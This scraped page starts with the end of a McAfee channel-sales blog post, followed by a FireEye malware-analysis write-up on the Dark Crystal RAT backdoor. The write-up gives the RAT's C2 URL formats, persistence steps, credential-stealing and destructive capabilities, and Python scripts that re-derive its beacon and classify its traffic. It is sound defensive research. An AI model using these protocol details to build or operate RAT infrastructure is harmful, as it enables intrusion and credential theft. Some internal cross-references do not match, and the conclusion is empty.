Sheri Leach has more than 25 years of experience working with distribution partners and has spent the last 14 years growing Ingram Micro with their McAfee business. In 2019, Sheri played a key role in working with Ingram Micro and delivering a Business Intelligence program that helped achieve net new logos which was one of McAfee’s 2019 initiatives. In addition, she played an integral role in developing operational excellence and automation within Ingram Micro when McAfee implemented their CPQ enhancement. She was also tightly aligned with Ingram Micro’s marketing team on the creation of a “no touch” McAfee sales program via demand generation and product attachment. Finally, Sheri helped facilitate a creative finance program between Ingram Micro and McAfee to bring in deals that would not have been possible before.

Natalie Tomlin – Director, Channel Sales Cloud and Service Providers

Natalie Tomlin is a McAfee veteran who joined when the company was known as Network Associates more than 20 years ago. She has held roles in sales and channel sales and has been a Channel Director for the past four years. In 2019, Natalie developed strong business relationships with the top Cloud Service Providers as they helped their customers on their journey to the cloud as a de facto security provider, facilitated discussions for operational efficiencies so McAfee can transact with the CSPs in both public and gov cloud, and brought in incremental revenue from the channel.

This recognition is special and underscores the work that we’ve done as an organization to hire diverse talent, implement a return to workplace initiative to assist people who have paused their careers, and achieve gender pay parity across the company.

Please join me in congratulating these six outstanding women who are at the core of the McAfee Channel program. Their leadership and execution have been paramount to our success and will continue to help lead us onwards.

The post McAfee Recognized on CRN’s 2020 Women of the Channel appeared first on McAfee Blogs.

Analyzing Dark Crystal RAT, a C# Backdoor

The FireEye Mandiant Threat Intelligence Team helps protect our customers by tracking cyber attackers and the malware they use. The FLARE Team helps augment our threat intelligence by reverse engineering malware samples. Recently, FLARE worked on a new C# variant of Dark Crystal RAT (DCRat) that the threat intel team passed to us. We reviewed open source intelligence and prior work, performed sandbox testing, and reverse engineered the Dark Crystal RAT to review its capabilities and communication protocol. Through publishing this blog post we aim to help defenders look for indicators of compromise and other telltale signs of Dark Crystal RAT, and to assist fellow malware researchers new to .NET malware, or who encounter future variants of this sample.

Discovering Dark Crystal RAT

The threat intel team provided FLARE with an EXE sample, believed to contain Dark Crystal RAT, and having the MD5 hash b478d340a787b85e086cc951d0696cb1. Using sandbox testing, we found that this sample produced two executables, and in turn, one of those two executables produced three more. Figure 1 shows the relationships between the malicious executables discovered via sandbox testing.


Figure 1: The first sample we began analyzing ultimately produced five executables.

Armed with the sandbox results, our next step was to perform a triage analysis on each executable. We found that the original sample and mnb.exe were droppers, that dal.exe was a clean-up utility to delete the dropped files, and that daaca.exe and fsdffc.exe were variants of Plurox, a family with existing reporting. Then we moved to analyzing the final dropped sample, which was dfsds.exe. We found brief public reporting by @James_inthe_box on the same sample, identifying it as DCRat and as a RAT and credential stealer. We also found a public sandbox run that included the same sample. Other public reporting described DCRat, but actually analyzed the daaca.exe Plurox component bundled along with DCRat in the initial sample.

Satisfied that dfsds.exe was a RAT lacking detailed public reporting, we decided to perform a deeper analysis.

Analyzing Dark Crystal RAT

Initial Analysis

Setting our sandbox aside for a moment, we performed static analysis on dfsds.exe. We began with CFF Explorer, a good tool for opening a PE file and breaking its sections down into an easily viewed form. As shown in Figure 2, CFF Explorer showed that dfsds.exe is a .NET executable, which meant we could take a very different analysis path than we would for a native C or C++ sample. Techniques we might otherwise use to narrow down a native sample's functionality, such as looking at which DLLs it imports and which functions it uses from them, yield nothing useful here: as shown in Figure 3, dfsds.exe imports only the function _CorExeMain from mscoree.dll, the stub that hands control to the .NET runtime. We could have opened dfsds.exe in IDA Pro, but IDA Pro is usually not the most effective way to analyze .NET samples; in fact, the free version of IDA Pro cannot handle .NET Common Language Infrastructure (CLI) intermediate code.


Figure 2: CFF Explorer shows that dfsds.exe is a .NET executable.


Figure 3: The import table for dfsds.exe is not useful as it contains only one function.

Instead of using a disassembler like IDA Pro on dfsds.exe, we used a .NET decompiler. Luckily for the reverse engineer, decompilers operate at a higher level and often produce a close approximation of the original C# code. dnSpy is a great .NET decompiler. dnSpy’s interface displays a hierarchy of the sample’s namespaces and classes in the Assembly Explorer and shows code for the selected class on the right. Upon opening dfsds.exe, dnSpy told us that the sample’s original name at link time was DCRatBuild.exe, and that its entry point is at <PrivateImplementationDetails>{63E52738-38EE-4EC2-999E-1DC99F74E08C}.Main, shown in Figure 4. When we browsed to the Main method using the Assembly Explorer, we found C#-like code representing that method in Figure 5. Wherever dnSpy displays a call to another method in the code, it is possible to click on the target method name to go to it and view its code. By right-clicking on an identifier in the code, and clicking Analyze in the context menu, we caused dnSpy to look for all occurrences where the identifier is used, similar to using cross-references in IDA Pro.


Figure 4: dnSpy can help us locate the sample's entry point


Figure 5: dnSpy decompiles the Main method into C#-like code

We went to the SchemaServerManager.Main method that is called from the entry point method, and observed that it makes many calls to ExporterServerManager.InstantiateIndexer with different integer arguments, as shown in Figure 6. We browsed to the ExporterServerManager.InstantiateIndexer method, and found that it is structured as a giant switch statement with many goto statements and labels; Figure 7 shows an excerpt. This does not look like typical dnSpy output, as dnSpy often reconstructs a close approximation of the original C# code, albeit with the loss of comments and local variable names. This code structure, combined with the fact that the code refers to the CipherMode.CBC constant, led us to believe that ExporterServerManager.InstantiateIndexer may be a decryption or deobfuscation routine. Therefore, dfsds.exe is likely obfuscated. Luckily, .NET developers often use obfuscation tools that are somewhat reversible through automated means.


Figure 6: SchemaServerManager.Main makes many calls to ExporterServerManager.InstantiateIndexer


Figure 7: ExporterServerManager.InstantiateIndexer looks like it may be a deobfuscation routine

Deobfuscation

De4dot is a .NET deobfuscator that knows how to undo many types of obfuscations. Running de4dot -d (for detect) on dfsds.exe (Figure 8) informed us that .NET Reactor was used to obfuscate it.

> de4dot -d dfsds.exe

de4dot v3.1.41592.3405 Copyright (C) 2011-2015 de4dot@gmail.com
Latest version and source code: https://github.com/0xd4d/de4dot

Detected .NET Reactor (C:\...\dfsds.exe)

Figure 8: dfsds.exe is obfuscated with .NET Reactor

After confirming that de4dot can deobfuscate dfsds.exe, we ran it again to deobfuscate the sample into the file dfsds_deob.exe (Figure 9).

> de4dot -f dfsds.exe -o dfsds_deob.exe

de4dot v3.1.41592.3405 Copyright (C) 2011-2015 de4dot@gmail.com
Latest version and source code: https://github.com/0xd4d/de4dot

Detected .NET Reactor (C:\Users\user\Desktop\intelfirst\dfsds.exe)
Cleaning C:\Users\user\Desktop\intelfirst\dfsds.exe
Renaming all obfuscated symbols
Saving C:\Users\user\Desktop\intelfirst\dfsds_deob.exe

Figure 9: de4dot successfully deobfuscates dfsds.exe

After deobfuscating dfsds.exe, we ran dnSpy again on the resulting dfsds_deob.exe. When we decompiled SchemaServerManager.Main again, the results were much different, as shown in Figure 10. Contrasting the new output with the obfuscated version shown previously in Figure 6, we found the deobfuscated code much more readable. In the deobfuscated version, all the calls to ExporterServerManager.InstantiateIndexer were removed; as suspected, it was apparently a string decoding routine. In contrast, the class names shown in the Assembly Explorer did not change; the obfuscator must have irrecoverably replaced the original class names with meaningless ones obtained from a standard list. Next, we noted that ten lines in Figure 10 hold base64-encoded data. Once the sample was successfully deobfuscated, it was time to move on to extracting its configuration and to follow the sample’s code path to its persistence capabilities and initial beacon.


Figure 10: Deobfuscating dfsds.exe shows that the method begins with some path manipulation and then accesses Base64-encoded data

Configuration, Persistence and Initial Beacon

Recall that in Figure 10 we found that the method SchemaServerManager.Main has a local variable containing Base64-encoded data; decoding that data revealed what it contains. Figure 11 shows the decoded configuration (with C2 endpoint URLs de-fanged):

> echo TUhvc3Q6aHR0cDovL2RvbWFsby5vbmxpbmUva3NlemJseGx2b3Uza2NtYnE4bDdoZjNmNGN5NXhnZW80dWRsYTkxZHVldTNxYTU0LzQ2a3FianZ5a2x1bnAxejU2dHh6a2hlbjdnamNpM2N5eDhnZ2twdHgyNWk3NG1vNm15cXB4OWtsdnYzL2FrY2lpMjM5bXl6b24weHdqbHhxbm4zYjM0dyxCSG9zdDpodHRwOi8vZG9tYWxvLm9ubGluZS9rc2V6Ymx4bHZvdTNrY21icThsN2hmM2Y0Y3k1eGdlbzR1ZGxhOTFkdWV1M3FhNTQvNDZrcWJqdnlrbHVucDF6NTZ0eHpraGVuN2dqY2kzY3l4OGdna3B0eDI1aTc0bW82bXlxcHg5a2x2djMvYWtjaWkyMzlteXpvbjB4d2pseHFubjNiMzR3LE1YOkRDUl9NVVRFWC13TGNzOG8xTlZFVXRYeEo5bjl5ZixUQUc6VU5ERUY= | base64 -d

MHost:hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w,BHost:hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w,MX:DCR_MUTEX-wLcs8o1NVEUtXxJ9n9yf,TAG:UNDEF

Figure 11: Decoding the base64 data in SchemaServerManager.Main reveals a configuration string

Figure 11 shows that the data decoded to a configuration string containing four values: MHost, BHost, MX, and TAG. We analyzed the code that parses this string and found that MHost and BHost were used as its main and backup command and control (C2) endpoints. Observe that the MHost and BHost values in Figure 11 are identical, so this sample did not have a backup C2 endpoint.

In dnSpy it is possible to give classes and methods meaningful names just as it is possible to name identifiers in IDA Pro. For example, the method SchemaServerManager.StopCustomer picks the name of a random running process. By right-clicking the StopCustomer identifier and choosing Edit Method, it is possible to change the method name to PickRandomProcessName, as shown in Figure 12.


Figure 12: Assigning meaningful names to methods makes it easier to keep analyzing the program

Continuing to analyze the SchemaServerManager.Main method revealed that the sample persists across reboots. The persistence algorithm can be summarized as follows:

  1. The malware picks the name of a random running process, and then copies itself to %APPDATA% and C:\. For example, if svchost.exe is selected, then the malware copies itself to %APPDATA%\svchost.exe and C:\svchost.exe.
  2. The malware creates a shortcut %APPDATA%\dotNET.lnk pointing to the copy of the malware under %APPDATA%.
  3. The malware creates a shortcut named dotNET.lnk in the logged-on user’s Startup folder pointing to %APPDATA%\dotNET.lnk.
  4. The malware creates a shortcut C:\Sysdll32.lnk pointing to the copy of the malware under C:\.
  5. The malware creates a shortcut named Sysdll32.lnk in the logged-on user’s Startup folder pointing to C:\Sysdll32.lnk.
  6. The malware creates the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\scrss pointing to %APPDATA%\dotNET.lnk.
  7. The malware creates the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Wininit pointing to C:\Sysdll32.lnk.

After its persistence steps, the malware checks for multiple instances of the malware:

  1. The malware sleeps for a random interval between 5 and 7 seconds.
  2. The malware takes the MD5 hash of the still-base64-encoded configuration string, and creates the mutex whose name is the hexadecimal representation of that hash. For this sample, the malware creates the mutex bc2dc004028c4f0303f5e49984983352. If this fails because another instance is running, the malware exits.

The malware then beacons, which also allows it to determine whether to use the main host (MHost) or backup host (BHost). To do so, the malware constructs a beacon URL based on the MHost URL, makes a request to the beacon URL, and then checks to see if the server responds with the HTTP response body “ok.” If the server does not send this response, then the malware unconditionally uses the BHost; this code is shown in Figure 13. Note that since this sample has the same MHost and BHost value (from Figure 11), the malware uses the same C2 endpoint regardless of whether the check succeeds or fails.


Figure 13: The malware makes an HTTP request based on the MHost URL to determine whether to use the MHost or BHost

The full algorithm to obtain the beacon URL is as follows:

  1. Obtain the MHost URL, i.e., hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w.
  2. Calculate the SHA1 hash of the full MHost URL, i.e., 56743785cf97084d3a49a8bf0956f2c744a4a3e0.
  3. Remove the last path component from the MHost URL, then append the SHA1 hash from above, the extension .php, and the query string ?data=active. The full beacon URL is therefore hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/56743785cf97084d3a49a8bf0956f2c744a4a3e0.php?data=active.
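The configuration parsing, mutex naming, beacon URL construction and MHost/BHost selection described above, re-implemented as an added example. This is not code from the post or from the sample. The configuration plaintext is the string decoded in Figure 11, refanged; the hashing conventions (UTF-8 input, lowercase hex digests, unwrapped Base64) are assumptions. The post reports the mutex name bc2dc004028c4f0303f5e49984983352 and the SHA1 value 56743785cf97084d3a49a8bf0956f2c744a4a3e0 for this sample, so the values the script prints can be compared against those.

```python
"""Re-derive DCRat's configuration fields, mutex name and beacon URL.

Added example; not code from the FireEye post or from the sample. The
configuration plaintext is the one decoded in the post, refanged; the
hashing conventions (UTF-8 input, lowercase hex digests, unwrapped Base64)
are assumptions.
"""
import base64
import hashlib
from urllib.parse import urlsplit, urlunsplit

# MHost/BHost from the decoded configuration, refanged (hxxp -> http,
# domalo[.]online -> domalo.online). Do not resolve it from a connected box.
MHOST = ("http://domalo.online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54"
         "/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3"
         "/akcii239myzon0xwjlxqnn3b34w")
CONFIG_PLAINTEXT = f"MHost:{MHOST},BHost:{MHOST},MX:DCR_MUTEX-wLcs8o1NVEUtXxJ9n9yf,TAG:UNDEF"
# The sample embeds the Base64 form; re-encode so the rest works from that.
CONFIG_B64 = base64.b64encode(CONFIG_PLAINTEXT.encode("utf-8")).decode("ascii")


def parse_config(config_b64: str) -> dict:
    """Decode the blob and split 'key:value,key:value' into a dict.

    Values are URLs containing ':', so split each field on its first ':'
    only. Assumption: no value contains ','.
    """
    plaintext = base64.b64decode(config_b64).decode("utf-8")
    fields = {}
    for item in plaintext.split(","):
        key, _, value = item.partition(":")
        fields[key] = value
    return fields


def mutex_name(config_b64: str) -> str:
    """Mutex = hex(MD5(configuration string, still Base64-encoded))."""
    return hashlib.md5(config_b64.encode("ascii")).hexdigest()


def beacon_url(mhost: str) -> str:
    """Drop MHost's last path component, append SHA1(MHost) + '.php?data=active'."""
    digest = hashlib.sha1(mhost.encode("utf-8")).hexdigest()
    parts = urlsplit(mhost)
    parent = parts.path.rsplit("/", 1)[0]
    return urlunsplit((parts.scheme, parts.netloc, f"{parent}/{digest}.php", "data=active", ""))


def select_c2(mhost: str, bhost: str, beacon_body: str) -> str:
    """MHost only when the beacon reply body is exactly 'ok' (per the post); otherwise BHost."""
    return mhost if beacon_body == "ok" else bhost


if __name__ == "__main__":
    cfg = parse_config(CONFIG_B64)
    print("MHost  :", cfg["MHost"])
    print("BHost  :", cfg["BHost"])
    print("mutex  :", mutex_name(CONFIG_B64))
    print("beacon :", beacon_url(cfg["MHost"]))
    # With no reply from the beacon endpoint the malware falls back to BHost.
    print("C2 used:", select_c2(cfg["MHost"], cfg["BHost"], beacon_body=""))
```

The mutex name is a usable host-based indicator only if the Base64 blob is reproduced byte-for-byte, so when extracting it from another build, hash the blob as it sits in the binary rather than re-encoding the decoded text.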

After beaconing the malware proceeds to send and receive messages with the configured C2.

Messages and Capabilities

After performing static analysis of dfsds.exe to determine how it selects the C2 endpoint and confirming the C2 endpoint URL, we shifted to dynamic analysis in order to collect sample C2 traffic and make it easier to understand the code that generates and accepts C2 messages. Luckily for our analysis, the malware continues to generate requests to the C2 endpoint even if the server does not send a valid response. To listen for and intercept requests to the C2 endpoint (domalo[.]online) without allowing the malware Internet access, we used FLARE’s FakeNet-NG tool. Figure 14 shows some of the C2 requests that the malware made being captured by FakeNet-NG.


Figure 14: FakeNet-NG can capture the malware's HTTP requests to the C2 endpoint

By comparing the messages generated by the malware and captured in FakeNet-NG with the malware’s decompiled code, we determined its message format and types. Observe that the last HTTP request visible in Figure 14 contains a list of running processes. By tracing through the decompiled code, we found that the method SchemaServerManager.ObserverWatcher.NewMerchant generated this message. We renamed this method to taskThread and assigned meaningful names to the other methods it calls; the resulting code for this method appears in Figure 15.


Figure 15: The method that generates the list of running processes and sends it to the C2 endpoint

By analyzing the code further, we identified the components of the URLs that the malware used to send data to the C2 endpoint, and how they are constructed.

Beacons

The first type of URL is a beacon, sent only once when the malware starts up. For this sample, the beacon URL was always hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/<hash>.php?data=active, where <hash> is the SHA1 hash of the MHost URL, as described earlier.

GET requests, format 1

When the malware needs to send data to or receive data from the C2, it sends a message. The first type of message, which we denote as "format 1," is a GET request to URLs of the form hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w/<hash>.php?type=__ds_setdata&__ds_setdata_user=<user_hash>&__ds_setdata_ext=<message_hash>&__ds_setdata_data=<message>, where:

  • <hash> is MD5(SHA1(MHost)), which for this sample, is 212bad81b4208a2b412dfca05f1d9fa7.
  • <user_hash> is a unique identifier for the machine on which the malware is running. It is always calculated as SHA1(OS_version + machine_name + user_name) as provided by the .NET System.Environment class.
  • <message_hash> identifies what kind of message the malware is sending to the C2 endpoint. The <message_hash> is calculated as MD5(<message_type> + <user_hash>), where <message_type> is a short keyword identifying the type of message, and <user_hash> is as calculated above.
    • Values for <message_type> exist for each command that the malware supports; for possible values, see the “msgs” variable in the code sample shown in Figure 19.
    • Note that this makes it hard to read the message type from logged traffic, or to write a static network signature for it, because the hash changes for every machine through the inclusion of <user_hash>. A defender who knows a host's OS version, machine name and user name can, however, precompute that host's hashes.
    • One type of message uses the value u instead of a hash for <message_hash>.
  • <message> is the message data, which is not obscured in any way.

The other type of ordinary message is a getdata message. These are GET requests to URLs of the form hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w/<hash>.php?type=__ds_getdata&__ds_getdata_user=<user_hash>&__ds_getdata_ext=<message_hash>&__ds_getdata_key=<key>, where:

  • <hash> and <user_hash> are calculated as described above for setdata messages.
  • <message_hash> is also calculated as described above for setdata messages, but describes the type of message the malware is expecting to receive in the server's response.
  • <key> is MD5(<user_hash>).

The server is expected to respond to a getdata message with an appropriate response for the type of message specified by <message_hash>.

GET requests, format 2

A few types of messages from the malware to the C2 use a different format, which we denote as "format 2." These messages are GET requests of the form hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w/<user_hash>.<message_hash>, where:

  • <user_hash> is calculated as described above for setdata messages.
  • <message_hash> is also calculated as described above for setdata messages, but describes the type of message the malware is expecting to receive in the server's response. <message_hash> may also be the literal string comm.

Table 1 shows the possible <message_type> values that may be incorporated into <message_hash> as part of format 2 messages to tell the server which type of response is desired. In contrast to format 1 messages, format 2 messages are only used for a handful of <message_type> values.

<message_type>   Response desired
s_comm           The server sends a non-empty response if a screenshot request is pending
m_comm           The server sends a non-empty response if a microphone request is pending
RDK              The server responds directly with keystrokes to replay
comm             The server responds directly with other types of tasking

Table 1: Message types when the malware uses a special message to request tasking from the server

POST requests

When the malware needs to upload large files, it makes a POST request. These POST requests are sent to hxxp://domalo[.]online/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w/<hash>.php, with the following parameters in the POST data:

  • name is <user_hash> + "." + <message_type>, where <user_hash> is calculated as described above and <message_type> is the type of data being uploaded.
  • upload is a file with the data being sent to the server.

Table 2 shows possible <message_type> values along with the type of file being uploaded.

<message_type>   Type of file
jpg              Screenshot
zipstealerlog    Cookie stealer log
wav              Microphone recording
file             Uploaded file
bmp              Webcam image
RD.jpg           Remote control screenshot

Table 2: Message types when files are uploaded to the server
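A classifier for the three request shapes described above (format 1 getdata GETs, format 2 `<user_hash>.<message_hash>` GETs, and file-upload POSTs), written as an added example for this write-up rather than FireEye's code. It treats `<hash>` and `<user_hash>` as opaque 32-hex-digit strings (the malware's own hash derivation is not reproduced), uses constructed sample values with a placeholder host, and checks the one invariant the format documents: `<key>` must equal MD5(`<user_hash>`).

```python
"""Classifier for Dark Crystal RAT C2 request shapes (added example, not FireEye's
code). <hash>, <user_hash> and <message_hash> are treated as opaque 32-hex-digit
strings; the only relation verified is the documented <key> = MD5(<user_hash>)."""
import hashlib
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

HEX32 = re.compile(r"^[0-9a-f]{32}$")
# Format 1 GETs and uploads end in <hash>.php; format 2 GETs end in
# <user_hash>.<message_hash>, where <message_hash> may be the literal "comm".
PHP_RE = re.compile(r"^([0-9a-f]{32})\.php$")
FORMAT2_RE = re.compile(r"^([0-9a-f]{32})\.([0-9a-f]{32}|comm)$")


def expected_key(user_hash: str) -> str:
    """<key> is MD5(<user_hash>) for getdata messages."""
    return hashlib.md5(user_hash.encode("ascii")).hexdigest()


def classify_request(method: str, url: str, post_name: Optional[str] = None) -> Optional[dict]:
    """Describe a DCRat-shaped request, or return None when the URL does not fit.

    post_name is the "name" field of a POST body (<user_hash>.<message_type>).
    The host and the long path prefix are deliberately not matched: they are
    sample-specific, while the request shape is what a generic rule keys on.
    """
    parts = urlsplit(url)
    last = parts.path.rsplit("/", 1)[-1]
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}

    if method == "POST":
        if not (PHP_RE.match(last) and post_name):
            return None
        user_hash, sep, message_type = post_name.partition(".")
        if not (sep and HEX32.match(user_hash)):
            return None
        return {"kind": "upload", "user_hash": user_hash, "message_type": message_type}

    if method != "GET":
        return None

    if PHP_RE.match(last):
        if query.get("data") == "active":  # beacon, as seen in the IoC table
            return {"kind": "beacon", "hash": last[:-4]}
        msg_type = query.get("type")
        if msg_type == "__ds_getdata":
            user_hash = query.get("__ds_getdata_user", "")
            if not HEX32.match(user_hash):
                return None
            return {
                "kind": "getdata",
                "user_hash": user_hash,
                "message_hash": query.get("__ds_getdata_ext", ""),
                # A key that is not MD5(user_hash) is a false positive or a
                # variant; either way it deserves a different alert.
                "key_valid": query.get("__ds_getdata_key") == expected_key(user_hash),
            }
        if msg_type == "__ds_setdata":
            return {"kind": "setdata", "params": query}
        return None

    fmt2 = FORMAT2_RE.match(last)
    if fmt2 and not parts.query:
        return {"kind": "format2", "user_hash": fmt2.group(1), "message_hash": fmt2.group(2)}
    return None


def scan_proxy_log(lines) -> list:
    """Run the classifier over "METHOD URL [name=<post name>]" log lines."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 2:
            continue
        post_name = next((f[5:] for f in fields[2:] if f.startswith("name=")), None)
        hit = classify_request(fields[0], fields[1], post_name)
        if hit:
            hits.append(hit)
    return hits


# Constructed sample values and log lines (not real indicators).
USER = "0123456789abcdef0123456789abcdef"
HASH = "00112233445566778899aabbccddeeff"
MSG = "fedcba9876543210fedcba9876543210"
PREFIX = "http://c2.example.invalid/seg1/seg2/seg3/"
SAMPLE_LOG = [
    f"GET {PREFIX}{HASH}.php?data=active",
    f"GET {PREFIX}{HASH}.php?type=__ds_getdata&__ds_getdata_user={USER}"
    f"&__ds_getdata_ext={MSG}&__ds_getdata_key={expected_key(USER)}",
    f"GET {PREFIX}{HASH}.php?type=__ds_getdata&__ds_getdata_user={USER}"
    f"&__ds_getdata_ext={MSG}&__ds_getdata_key={'0' * 32}",
    f"GET {PREFIX}{USER}.comm",
    f"POST {PREFIX}{HASH}.php name={USER}.jpg",
    "GET http://www.example.com/index.php?data=active",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```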

Capabilities

By analyzing the code that handles the responses to the comm message (format 2), it was possible for us to inventory the malware’s capabilities. Table 3 shows the keywords used in responses along with the description of each capability.

Keyword              Description
shell                Execute a shell command
deleteall            Recursively delete all files from C:, D:, F:, and G:
closecd              Close the CD-ROM drive door
setwallpaper         Change the background wallpaper
ddos                 Send TCP and UDP packets to a given host or IP address
logoff               Log off the current user
keyboardrecorder     Replay keystrokes as if the user had typed them
fm_newfolder         Create a new folder
fm_rename            Rename or move a file
desktopHide          Hide desktop icons
keyloggerstart       Start logging keystrokes
exec_cs_code         Compile and execute C# code
msgbox               Open a Windows MessageBox
fm_upload            Transfer a file from the C2 to the client
rdp                  Re-spawn the malware running as an administrator
fm_zip               Build a ZIP file from a directory tree and transfer it from the client to the C2
webcam               Take a webcam picture
fm_unzip             Unzip a ZIP file to a given path on the client
keyloggerstop        Stop logging keystrokes
fm_drives            Enumerate drive letters
cookiestealer        Transfer cookies and browser/FileZilla saved credentials to the C2
fm_delete            Recursively delete a given directory
dismon               Hide desktop icons and taskbar
fm_uploadu           Transfer a file from the C2 to the client
taskstart            Start a process
cleardesktop         Rotate screen
lcmd                 Run shell command and send standard output back to C2
taskbarShow          Show taskbar
clipboard            Set clipboard contents
cookiestealer_file   Save cookies and credentials to a local file
newuserpass          Create a new local user account
beep                 Beep for set frequency and duration
speak                Use speech synthesizer to speak text
openchat             Open chat window
taskbarHide          Hide the taskbar
RDStart              Start remote control over user’s desktop
closechat            Close chat window
RDStop               Stop remote control over user’s desktop
fm_opendir           List directory contents
uninstall            Remove the malware from the client
taskkill             Kill a process
forkbomb             Endlessly spawn instances of cmd.exe
fm_get               Transfer a file from the client to the C2
desktopShow          Show desktop icons
Clipboardget         Transfer clipboard contents to C2
playaudiourl         Play a sound file
opencd               Open the CD-ROM drive door
shutdown             Shut down the machine
restart              Restart the machine
browseurl            Open a web URL in the default browser

Table 3: Capabilities of DCRat

Proof-of-Concept Dark Crystal RAT Server

After gathering information from Dark Crystal RAT about its capabilities and C2 message format, another way to illustrate the capabilities and test our understanding of the messages was to write a proof-of-concept server. Here is a code snippet that we wrote containing a barebones DCRat server written in Python. Unlike a real RAT server, this one does not have a user interface to allow the attacker to pick and launch commands. Instead, it has a pre-scripted command list that it sends to the RAT.

When the server starts up, it uses the Python BaseHTTPServer to begin listening for incoming web requests (lines 166-174). Incoming POST requests are assumed to hold a file that the RAT is uploading to the server; this server assumes all file uploads are screenshots and saves them to “screen.png” (lines 140-155). For GET requests, the server must distinguish between beacons, ordinary messages, and special messages (lines 123-138). For ordinary messages, __ds_setdata messages are simply printed to standard output, while the only __ds_getdata message type supported is s_comm (screenshot communications), to which the server responds with the desired screenshot dimensions (lines 63-84). For messages of type comm, the server sends four types of commands in sequence: first, it hides the desktop icons; then, it causes the string “Hello this is tech support” to be spoken; next, it displays a message box asking for a password; finally, it launches the Windows Calculator (lines 86-121).

Figure 16 shows the results when Dark Crystal RAT is run on a system that has been configured to redirect all traffic to domalo[.]online to the proof-of-concept server we wrote.


Figure 16: The results when a Dark Crystal RAT instance communicates with the proof-of-concept server

Other Work and Reconnaissance

After reverse engineering Dark Crystal RAT, we continued reconnaissance to see what additional information we could find. One limitation to our analysis was that we did not wish to allow the sample to communicate with the real C2, so we kept it isolated from the Internet. To learn more about Dark Crystal RAT we tried two approaches: the first was to browse the Dark Crystal RAT website (files.dcrat[.]ru) using Tor, and the other was to take a look at YouTube videos of others’ experiments with the “real” Dark Crystal RAT server.

Dark Crystal RAT Website

We found that Dark Crystal RAT has a website at files.dcrat[.]ru, shown in Figure 17. Observe that there are options to download the RAT itself, as well as a few plugins; the DCLIB extension is consistent with the plugin loading code we found in the RAT.


Figure 17: The website files.dcrat[.]ru allows users to download Dark Crystal RAT and some of its plugins

Figure 18 shows some additional plugins, including plugins with the ability to resist running in a virtual machine, disable Windows Defender, and disable webcam lights on certain models. No plugins were bundled with the sample we studied.


Figure 18: Additional plugins listed on the Dark Crystal RAT website

Figure 19 lists software downloads on the RAT page. We took some time to look at these files; here are some interesting things we discovered:

  • The DCRat listed on the website is actually a “builder” that packages a build of the RAT and a configuration for the attacker to deploy. This is consistent with the name DCRatBuild.exe shown back in Figure 4. In our brief testing of the builder, we found that it had a licensing check. We did not pursue bypassing it once we found public YouTube videos of the DCRat builder in operation, as we show later.
  • The DarkCrystalServer is not self-contained; rather, it is just a PHP file that asks the user for a username and password and then downloads and installs the server software. Because it requires credentials and communicates back with dcrat[.]ru (Figure 20), we did not pursue further analysis of DarkCrystalServer.


Figure 19: The RAT page lists software for the RAT, the server, an API, and plugin development


Figure 20: The DarkCrystalServer asks for a username and password and calls back to dcrat[.]ru to download software, so we did not pursue it further

YouTube Videos

As part of confirming our findings about Dark Crystal RAT capabilities that we obtained through reverse engineering, we found some YouTube demonstrations of the DCRat builder and server.

The YouTube user LIKAR has a YouTube demonstration of Dark Crystal RAT. The author demonstrates use of the Dark Crystal RAT software on a server with two active RAT instances. During the video, the author browses through the various screens in the software. This made it easy to envision how a threat actor would use the RAT, and to confirm our suspicions of how it works.

Figure 21 shows a capture from the video at 3:27. Note that the Dark Crystal RAT builder software refers to the DCRatBuild package as a “server” rather than a client. Also observe that one of the build options is a choice between Java and C# (Beta). By watching this YouTube video and doing some additional background research, we discovered that Dark Crystal RAT has existed for some time in a Java version; the C# version is relatively new. This explained why we could not find much detailed prior reporting about it.


Figure 21: A YouTube demonstration revealed that Dark Crystal RAT previously existed in a Java version, and the C# version we analyzed is in beta

Figure 22 shows another capture from the video at 6:28. The functionality displayed on the screen lines up nicely with the “msgbox”, “browseurl”, “clipboard”, “speak”, “opencd”, “closecd”, and other capabilities we discovered and enumerated in Table 6.


Figure 22: A YouTube demonstration confirmed many of the Dark Crystal RAT capabilities we found in reverse engineering

Conclusion

